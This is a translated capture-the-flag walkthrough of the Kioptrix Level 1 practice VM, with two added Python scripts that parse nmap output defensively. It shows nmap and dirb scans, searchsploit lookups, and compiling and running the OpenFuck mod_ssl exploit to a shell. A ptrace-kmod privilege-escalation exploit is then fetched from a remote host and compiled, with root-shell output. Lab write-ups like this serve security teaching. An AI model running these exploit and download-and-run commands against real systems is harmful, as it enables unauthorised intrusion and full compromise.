| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_3DES_EDE_CBC_SHA
| References:
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| http://www.cvedetails.com/cve/2014-0224
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
1024/tcp open kdm
MAC Address: 00:0C:29:0C:9B:0B (VMware)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
Nmap done: 1 IP address (1 host up) scanned in 314.40 seconds
┌──(root㉿kali)-[~/work]
└─# ls
1.sh 2.sh 3.sh namo_ip.gnmap namo_ip.nmap namo_ip.xml
The three namo_ip.* files above are the output of the nmap scan (-oA writes all three formats). Here is what each contains:
File namo_ip.gnmap
This is nmap's grepable output format; it contains only the basic scan information and is convenient to search with grep and other text-processing tools. Contents:
- Scan target: 192.168.75.147
- Scan status: host up
- Open ports: 22/tcp (SSH), 80/tcp (HTTP), 111/tcp (RPC), 139/tcp (NetBIOS-SSN), 443/tcp (HTTPS), 1024/tcp (kdm)
File namo_ip.nmap
This is nmap's normal text output, containing the detailed scan information and vulnerability detection results. Contents:
- Port and service information:
  - 22/tcp: open SSH service.
  - 80/tcp: open HTTP service; the TRACE method is enabled and the /test.php page was found.
  - 111/tcp: open RPC service.
  - 139/tcp: open NetBIOS-SSN service.
  - 443/tcp: open HTTPS service with multiple vulnerabilities.
  - 1024/tcp: open kdm service.
- Vulnerability information:
  - Logjam (CVE-2015-4000): a TLS protocol flaw that lets a man-in-the-middle attacker downgrade a TLS session to 512-bit export-grade cryptography.
  - POODLE (CVE-2014-3566): an SSL 3.0 flaw that lets a man-in-the-middle attacker obtain cleartext data via a padding-oracle attack.
  - CCS Injection (CVE-2014-0224): an OpenSSL flaw in processing ChangeCipherSpec messages that lets a man-in-the-middle attacker hijack sessions or obtain sensitive information.
  - SMBv2 (CVE-2009-3103): an array index error in an SMBv2 protocol implementation that allows remote attackers to execute arbitrary code or cause a denial of service.
File namo_ip.xml
This is nmap's XML output, which other programs can parse. It holds the same information as the .nmap file, organized as XML for automated processing and analysis.
Summary
These files give detailed scan results for the target host 192.168.75.147, including open ports, service information and the security vulnerabilities present. This information is useful for security auditing and system administration and helps identify and fix potential security risks.
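The grepable file is the one meant for tooling, and its one-line-per-host layout is easy to misparse because nmap packs seven slash-separated fields into each port entry. The following script is an added example, not part of the original write-up or of nmap itself: it parses a constructed .gnmap file laid out like the scan of this host (with -sV fields filled in, where nmap writes "|" in place of "/" inside field values) and then diffs the open ports against an approved baseline, which is how a defender turns a periodic scan into an alert on unexpected listeners.

```python
import re
from typing import Dict, List

# Constructed grepable (-oG) output for the page's host; this is not the page's
# own namo_ip.gnmap, just text laid out the way nmap writes that format.
SAMPLE_GNMAP = """# Nmap 7.94SVN scan initiated Thu Dec  5 20:30:00 2024 as: nmap -sV -p 22,80,111,139,443,1024 -oA namo_ip 192.168.75.147
Host: 192.168.75.147 ()\tStatus: Up
Host: 192.168.75.147 ()\tPorts: 22/open/tcp//ssh//OpenSSH 2.9p2 (protocol 1.99)/, 80/open/tcp//http//Apache httpd 1.3.20 ((Unix) (Red-Hat|Linux) mod_ssl|2.8.4 OpenSSL|0.9.6b)/, 111/open/tcp//rpcbind//2 (RPC #100000)/, 139/open/tcp//netbios-ssn//Samba smbd (workgroup: MYGROUP)/, 443/open/tcp//ssl|https//Apache|1.3.20 (Unix) (Red-Hat|Linux) mod_ssl|2.8.4 OpenSSL|0.9.6b/, 1024/open/tcp//status//1 (RPC #100024)/
# Nmap done at Thu Dec  5 20:35:14 2024 -- 1 IP address (1 host up) scanned in 314.40 seconds
"""

# Field order of one "Ports:" entry: port/state/proto/owner/service/rpcinfo/version/
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc_info", "version")


def _parse_ports(value: str) -> List[dict]:
    """Split a Ports: field into records. Entries are comma separated, but a
    version string may itself contain commas, so split only where the next
    entry's port number follows."""
    records = []
    for item in re.split(r",\s+(?=\d+/)", value.strip()):
        parts = item.split("/")          # trailing "/" yields an empty 8th element, ignored by zip
        rec = dict(zip(PORT_FIELDS, parts))
        rec["port"] = int(rec["port"])
        # nmap substitutes "|" for "/" inside field values; restore the original text
        rec["service"] = rec["service"].replace("|", "/")
        rec["version"] = rec["version"].replace("|", "/")
        records.append(rec)
    return records


def parse_gnmap(text: str) -> Dict[str, dict]:
    """Map each scanned address to its status and list of port records."""
    hosts: Dict[str, dict] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # comment/banner lines start with "#"
        fields = line.split("\t")         # "Host: ip (name)" then tab-separated "Key: value" fields
        addr = fields[0].split()[1]
        entry = hosts.setdefault(addr, {"status": None, "ports": []})
        for field in fields[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["status"] = value
            elif key == "Ports":
                entry["ports"].extend(_parse_ports(value))
    return hosts


def unexpected_open_ports(hosts: Dict[str, dict], baseline: Dict[str, set]) -> Dict[str, List[int]]:
    """Open ports per host that are not in that host's approved baseline."""
    findings: Dict[str, List[int]] = {}
    for addr, entry in hosts.items():
        allowed = baseline.get(addr, set())
        extra = sorted(p["port"] for p in entry["ports"]
                       if p["state"] == "open" and p["port"] not in allowed)
        if extra:
            findings[addr] = extra
    return findings


if __name__ == "__main__":
    # Constructed baseline: only SSH and the web ports are supposed to be exposed.
    baseline = {"192.168.75.147": {22, 80, 443}}
    parsed = parse_gnmap(SAMPLE_GNMAP)
    for addr, ports in unexpected_open_ports(parsed, baseline).items():
        print(f"{addr}: unexpected open ports {ports}")
```

To use it on the real file, read namo_ip.gnmap from disk in place of SAMPLE_GNMAP; keeping the baseline per address lets the same script cover a whole subnet scan written with -oG.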
Directory enumeration scan
dirb http://192.168.75.147/
dirsearch -u 192.168.17.159
┌──(root㉿kali)-[~/work]
└─# dirb http://192.168.75.147
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Dec 5 20:48:31 2024
URL_BASE: http://192.168.75.147/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.75.147/ ----
+ http://192.168.75.147/~operator (CODE:403|SIZE:273)
+ http://192.168.75.147/~root (CODE:403|SIZE:269)
+ http://192.168.75.147/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.75.147/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.75.147/manual/
==> DIRECTORY: http://192.168.75.147/mrtg/
==> DIRECTORY: http://192.168.75.147/usage/
---- Entering directory: http://192.168.75.147/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.75.147/mrtg/ ----
+ http://192.168.75.147/mrtg/index.html (CODE:200|SIZE:17318)
---- Entering directory: http://192.168.75.147/usage/ ----
+ http://192.168.75.147/usage/index.html (CODE:200|SIZE:4261)
-----------------
END_TIME: Thu Dec 5 20:49:01 2024
DOWNLOADED: 13836 - FOUND: 6
The page at http://192.168.75.147/manual/ shows "Apache/1.3.20 Server at 127.0.0.1 Port 80".
Searching for vulnerabilities
Use searchsploit Apache 1.3.20 to look up related vulnerabilities and exploit information.
A look around the site turned up nothing major, so go straight to a vulnerability scanner to check whether the site has any weaknesses.
nikto -h http://192.168.17.159
searchsploit Apache 1.3.20
┌──(root㉿kali)-[~/work]
└─# searchsploit Apache 1.3.20
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure | windows/remote/21204.txt
Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access | windows/remote/19975.pl
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure | linux/remote/132.c
Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow | multiple/remote/2237.sh
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
Apache CouchDB < 2.1.0 - Remote Code Execution | linux/webapps/44913.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit) | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit) | multiple/remote/17691.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service | php/dos/44057.md
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
80/tcp: open HTTP service, Apache httpd 1.3.20 on Unix (Red Hat/Linux), with mod_ssl/2.8.4 and OpenSSL/0.9.6b.
┌──(root㉿kali)-[~/work]
└─# searchsploit mod_ssl 2.8.4
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/work]
└─# searchsploit Apache 1.3.20 mod_ssl 2.8.4
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
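As an added example (not part of the original writeup), a small Python check that parses nmap -sV service lines like the ones above and flags any banner advertising mod_ssl older than 2.8.7, the threshold the searchsploit titles give for the OpenFuck overflow (CVE-2002-0082). The sample scan lines are constructed; the function names are my own.

```python
import re
from typing import List, Optional, Tuple

# Threshold taken from the searchsploit titles: mod_ssl < 2.8.7 is affected
# (CVE-2002-0082, the overflow the OpenFuck exploits target).
MODSSL_FIXED = (2, 8, 7)

# Matches both banner styles nmap printed for this host:
#   "Apache httpd 1.3.20 ((Unix) ... mod_ssl/2.8.4 OpenSSL/0.9.6b)"
#   "Apache/1.3.20 (Unix) ... mod_ssl/2.8.4 OpenSSL/0.9.6b"
BANNER_RE = re.compile(
    r"Apache(?:/|\s+httpd\s+)(?P<apache>\d+(?:\.\d+)*).*?"
    r"mod_ssl/(?P<modssl>\d+(?:\.\d+)*).*?"
    r"OpenSSL/(?P<openssl>\d+(?:\.\d+)*[a-z]?)",
    re.IGNORECASE,
)

def parse_version(text: str) -> Tuple[int, ...]:
    """'2.8.4' -> (2, 8, 4); tuples compare numerically, so 2.8.12 > 2.8.7 (a string compare would get this wrong)."""
    return tuple(int(p) for p in re.findall(r"\d+", text))

def parse_banner(line: str) -> Optional[dict]:
    """Extract the Apache, mod_ssl and OpenSSL versions from one nmap service line."""
    m = BANNER_RE.search(line)
    if m is None:
        return None
    return {"apache": m["apache"], "mod_ssl": m["modssl"], "openssl": m["openssl"]}

def modssl_vulnerable(line: str) -> Optional[bool]:
    """True if the banner advertises mod_ssl older than 2.8.7; None if no
    mod_ssl version is exposed at all (the banner alone proves nothing then)."""
    info = parse_banner(line)
    if info is None:
        return None
    return parse_version(info["mod_ssl"]) < MODSSL_FIXED

def flag_scan(lines: List[str]) -> List[str]:
    """Return the lines of an nmap -sV listing whose banner is in the affected range."""
    return [ln for ln in lines if modssl_vulnerable(ln)]

# Constructed sample lines in the format of the nmap -sV output for this box.
SAMPLE_SCAN = [
    "80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)",
    "443/tcp  open  ssl/https   Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b",
    "8080/tcp open  http        Apache/1.3.27 (Unix) mod_ssl/2.8.12 OpenSSL/0.9.6j",
    "8443/tcp open  ssl/http    Apache httpd 2.4.58 ((Debian))",
]
```

Only the first two sample lines are flagged; the 2.8.12 line is a patched release and the last line exposes no mod_ssl version, so it is reported as unknown rather than safe.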
The -p option shows the full path of the exploit script and also copies that path to the clipboard, so the script is easy to locate and use.
┌──(root㉿kali)-[~/work]
└─# searchsploit -p 47080
Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
URL: https://www.exploit-db.com/exploits/47080
Path: /usr/share/exploitdb/exploits/unix/remote/47080.c
Codes: CVE-2002-0082, OSVDB-857
Verified: False
File Type: C source, ASCII text
Download the exploit
Exploit site (PoC and EXP):
https://www.exploit-db.com/
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c
Open the URL: https://www.exploit-db.com/exploits/47080
Copy the link address and download it with wget:
wget https://www.exploit-db.com/download/47080
It is recommended to download it on your own computer and copy it into the Kali VM.
Compile the code
Rename the downloaded file 47080 to 47080.c:
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# mv 47080 47080.c
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ls
47080.c namo_ip.gnmap namo_ip.nmap namo_ip.xml
(Since it is a C exploit it has to be compiled: gcc compiles the file, -o names the output 470, and 47080.c is the file to compile.)
An error appears:
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# gcc -o 470 47080.c
47080.c:21:10: fatal error: openssl/ssl.h: 没有那个文件或目录
21 | #include <openssl/ssl.h>
| ^~~~~~~~~~~~~~~
compilation terminated.
Solution
Change the apt mirror
Open the sources list:
vim /etc/apt/sources.list
# comment out the Kali default source
Then add a mirror; I chose Aliyun.
Official source
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib
USTC
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
Aliyun
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
Tsinghua University
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
Zhejiang University
deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
Press Shift and type :wq to save and exit.
Update the package list: after changing the source you need to refresh the package list. Run the following in a terminal:
apt-get update
Upgrade the system: if you also want to upgrade the system, run:
apt-get upgrade
Install the OpenSSL development library
apt-get update
apt-get install libssl-dev
Compile the C file:
Since it is a C exploit it has to be compiled: gcc compiles the file, -o names the output 470, and 47080.c is the file to compile.
-lcrypto needs the mirror change first (see the libssl-dev step above).
gcc -o 470 47080.c -lcrypto
searchsploit -m 47080.c
gcc -o exploit21671 47080.c -lssl -lcrypto
gcc -o exploit21671 47080.c -lssl -lcrypto -Wno-deprecated-declarations (if the build errors, use this one to suppress the warnings)
After compiling, as long as a binary has been produced, it is fine.
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# chmod 777 470
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# chmod +x 470
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ls -ls
总计 76
44 -rwxrwxrwx 1 root root 42448 12月 6日 08:59 470
32 -rw-r--r-- 1 root root 32290 12月 6日 08:58 47080.c
Running ./470 | grep "1.3.20" first executes the 470 binary in the current directory (with no arguments it prints its list of supported targets), then grep filters for lines containing "1.3.20"; the result is the set of target entries for apache-1.3.20 on different operating systems, each shown as a hex ID followed by a description.
./470 | grep "1.3.20"
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ./470 | grep "1.3.20"
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
Run the exploit to connect and get a shell
./470 0x6b 192.168.75.147 -c 40
Download the privilege escalation script
Open a new terminal and download it to the host.
Open a port and, as the low-privileged apache user, transfer the file to the target.
(Download it manually on your computer and upload it to the Kali VM; do not use wget first.)
wget https://dl.packetstormsecurity.net/0-exploits/ptrace-kmod.c
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ls
470 47080.c ptrace-kmod.c
Start a listener on port 80:
python -m http.server 80
Check the listening address:
ip a
Stopping whatever occupies the port
Find and stop the service occupying the port: if you really need port 80, find out which service is using it and stop it.
Use the following command to find the service on port 80: sudo netstat -tulpn | grep 80
Or use the ss command:
sudo ss -tulpn | grep 80
These commands list all processes using port 80. Use the kill command with the listed PID (process ID) to stop them:
sudo kill -9 <PID>
Use kill -9 with care, since it force-terminates the process and may cause data loss or other problems.
In the terminal that has the ptrace-kmod.c file:
From the low-privileged account, download the privilege escalation script.
After starting the Python HTTP server, use wget in the terminal that has the ptrace-kmod.c file:
wget http://192.168.75.145:80/ptrace-kmod.c
In the new terminal you can see:
Type exit to leave the shell.
Connect again:
./470 0x6b 192.168.75.147 -c 40
./470 0x6b 192.168.75.147 443 -c 40
whoami
Now root
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ./470 0x6b 192.168.75.147 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--10:13:28-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c.1'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: file path prefix `/usr/bin' never used
[+] Attached to 1826
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
ls
exploit
tool
cd /root
ls
anaconda-ks.cfg
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─# ./470 0x6b 192.168.75.147 443 -c 40
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--10:16:49-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
ls
exploit
tool
whoami
root
exit
bash-2.05$ exit
exit
exit
Good Bye!
┌──(root㉿kali)-[~/work/Kioptix_Level_1]
└─#
Originally published on the WeChat official account (泷羽sec-星辰系主): 01-Kioptix Level-1